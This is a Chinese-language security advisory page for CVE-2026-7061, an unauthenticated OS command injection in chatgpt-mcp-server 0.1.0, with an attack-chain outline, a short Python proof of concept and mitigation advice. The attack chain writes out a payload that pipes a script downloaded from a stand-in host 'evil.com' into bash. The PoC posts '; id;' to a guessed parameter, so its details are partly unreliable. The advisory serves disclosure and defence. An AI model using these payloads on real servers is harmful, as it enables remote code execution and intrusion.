CVE-2026-7061 CVSS 7.3 高危

CVE-2026-7061 chatgpt-mcp-server操作系统命令注入漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7061

漏洞类型

操作系统命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Toowiredd chatgpt-mcp-server

漏洞概述

CVE-2026-7061 是 Toowiredd chatgpt-mcp-server 0.1.0 及之前版本中发现的一个高危漏洞。该漏洞源于 MCP/HTTP 组件中存在操作系统命令注入缺陷，允许未经身份验证的远程攻击者通过恶意请求在服务器上执行任意代码。目前厂商尚未发布修复补丁，且已有公开的利用代码，用户面临极高的安全风险。

技术细节

漏洞发生在 Toowiredd chatgpt-mcp-server 的 `src/services/docker.service.ts` 文件中。该组件在处理 MCP/HTTP 协议请求时，未能正确过滤用户输入的参数，直接将其拼接到系统命令执行函数中。攻击者可以通过发送特制的 HTTP POST 请求，注入 Shell 元字符（如 `;` 或 `|`），从而在服务器后台执行任意操作系统命令。由于漏洞利用无需身份验证且无用户交互要求，远程攻击者可轻易获取服务器权限，进而窃取数据、破坏系统完整性或进行横向移动。鉴于漏洞利用代码已公开，风险极大。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找暴露的 Toowiredd chatgpt-mcp-server 服务（版本 <= 0.1.0）。

STEP 2

漏洞利用

攻击者向 `src/services/docker.service.ts` 对应的 HTTP 接口发送特制的数据包，其中包含拼接的 Shell 命令（如 `; wget http://evil.com/shell.sh | bash`）。

STEP 3

命令执行

服务器端未过滤恶意字符，将输入传递给系统调用，导致远程攻击者在服务器上下文中执行任意命令。

STEP 4

权限提升与持久化

攻击者利用执行权限获取敏感信息、安装后门或进一步控制宿主机及 Docker 容器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target-ip:port/api/mcp/endpoint"

# Malicious payload to execute 'id' command via OS command injection
# Assuming the vulnerable parameter is 'container_name' or similar based on docker.service.ts
payload = {
    "param": "; id;"
}

try:
    response = requests.post(target_url, json=payload, timeout=5)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    # Check if command execution output is present in response
    if "uid=" in response.text:
        print("[+] Vulnerability confirmed! Command executed successfully.")
    else:
        print("[-] Exploit failed or output not visible.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Toowiredd chatgpt-mcp-server <= 0.1.0

防御指南

临时缓解措施

由于官方尚未发布补丁，建议立即在网络边界封锁该服务的非必要端口（如 3000 或相关端口），仅允许内网可信IP访问。同时，检查服务器日志中是否存在异常的系统调用记录，如发现被入侵迹象，应立即隔离主机并进行取证分析。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7061
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7061
3 Details https://www.cvedetails.com/cve/CVE-2026-7061/
4 VulDB https://vuldb.com/cve/CVE-2026-7061
5 Link https://github.com/Toowiredd/chatgpt-mcp-server/
6 Link https://github.com/Toowiredd/chatgpt-mcp-server/issues/8
7 Link https://github.com/wing3e/public_exp/issues/28
8 Link https://vuldb.com/submit/798613
9 Link https://vuldb.com/vuln/359636
10 Link https://vuldb.com/vuln/359636/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表